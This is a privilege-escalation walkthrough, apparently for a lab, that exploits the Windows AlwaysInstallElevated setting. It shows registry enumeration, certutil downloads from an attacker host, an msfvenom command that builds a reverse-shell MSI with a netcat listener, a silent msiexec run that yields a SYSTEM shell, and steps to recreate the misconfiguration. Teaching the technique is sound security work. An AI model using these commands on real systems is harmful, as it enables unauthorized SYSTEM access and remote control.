What is AlwaysInstallElevated?
“AlwaysInstallElevated” is a Windows registry setting that allows non-administrative users to install software with elevated privileges. This setting is designed for use in certain enterprise environments where a standard user may need to install software without requiring an administrator to enter their credentials.
Why is it dangerous?
If an attacker gains access to a system with this setting enabled, they can potentially use it to install malware or other malicious software without needing to bypass the usual administrative controls. This can allow them to execute code with elevated privileges, potentially giving them access to sensitive data or allowing them to take control of the system.
In addition, if an attacker is able to modify the registry setting itself, they can potentially enable AlwaysInstallElevated and then use it to install malware or other malicious software without detection.
Topics covered
- How to find the vulnerability manually and with winpeas
- How to exploit it
- How to recreate the vulnerability
Enumerate
Scenario: We landed a shell as user1 and want to escalate privileges.
Note: AlwaysInstallElevated needs to be enabled for both the current user and the local machine for this exploit to work.
The first enumeration method I’ll go over is the manual enumeration. All we need to do is run the two commands below.
reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
The 0x1 on both of the screenshots above tells us that AlwaysInstallElevated is enabled for both the Local machine and the current user
To enumerate this with winpeas, we need to first bring it over
Host a python webserver on Kali where winpeas is located
python3 -m http.server 80
Now lets use certutil.exe to bring winpeas over
certutil.exe -urlcache -f http://192.168.4.4/winpeas.exe winpeas.exe
Run winpeas with the “systemsinfo” argument. Scrolling through the output, we can see that AlwaysInstallElevated is set to 1 meaning its enabled.
Exploiting
First, lets use msfvenom to create a reverse shell msi file. MSI files are a type of installer package used on Windows operating systems to install and manage software applications.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 --platform Windows -f msi > reverse.msi
Before downloading and executing the file on Windows, lets first create a netcat listener.
nc -lnvp 53
Now we can install the file. Host a python webserver on Kali and install it to Windows using certutil.exe the same way we downloaded winpeas.exe.
After the msi file is downloaded to the Windows machine, we can use msiexec to execute the msi file.
msiexec /quiet /qn /i reverse.msi
Back on the netcat listener, we get a shell as NT Authority\System
Replicate the Vulnerability
Log into the Windows machine as an Administrator and open command prompt.
First, we need to identify the SID of the user we want to give the vulnerability to
wmic useraccount where name='user1' get sid
Now, open registry editor and go to the following registry key.
HKEY_USERS\<USER_SID>\Software\Policies\Microsoft\WindowsOnce you’re there, right click on the Windows key, then click New > Key.
Make sure you name the Key “Installer”
Now right click on the “Installer” key and, click “New” > “DWORD (32-bit) Value”
Name it “AlwaysInstallElevated”
Now right click it and select “Modify”
After that, change the Value of the data to 1
To confirm that it worked, open up command prompt as user1 and type this
reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
Recap
Run either winpeas.exe or type the below to check for vulnerabilities
reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevatedCreate an msi reverse shell with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=53 --platform Windows -f msi > reverse.msiOnce you bring it over to the Windows machine, type the below to execute it
msiexec /quiet /qn /i reverse.msi